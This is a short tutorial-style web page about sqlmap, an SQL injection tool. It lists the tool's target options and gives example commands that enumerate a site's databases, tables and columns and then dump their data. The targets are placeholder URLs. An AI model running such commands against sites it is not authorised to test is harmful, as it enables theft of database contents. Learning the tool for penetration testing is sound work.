Multi Purpose Hacking/ Pentesting Tools
What is Sqlmap?
sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It includes a powerful detection engine, a lot of niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Is Sqlmap free?
Yes, sqlmap is free to use and works out of the box with Python version 2.6.x and 2.7.x on any platform/p>
Some options for python sqlmap.py
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program’s version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target: At least one of these options has to be provided to define the target(s)
-d DIRECT Connection string for direct database connection
-u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-x SITEMAPURL Parse target(s) from remote sitemap(.xml) file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
What are the Typical Uses for sqlmap
Sqlmap is written in python and is considered as one of the most powerful and popular sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. This hacking tool can even read and write files on the remote file system under certain conditions. sqlmap is like metasploit of sql injections.
How To Install Sqlmap
This tool works best on Linux, preferably something like Kali Linux, Backbox or any other flavours therein for Pentesting Purposes.
sqlmap -u "http://www.yourwebsiteurl.com/section...(without quotation marks)" --dbs
sqlmap -u "http://www.yourwebsiteurl.comsection....(without quotation marks)" -D database_name --tables
sqlmap -u "http://www.yourwebsiteurl.com/section...(without quotation marks)" -D database_name -T tables_name --columns
sqlmap -u "http://www.site.com/section.php?id=51(without quotation marks)" -D database_name -T tables_name -C column_name --dump
Enjoy and use responsibly!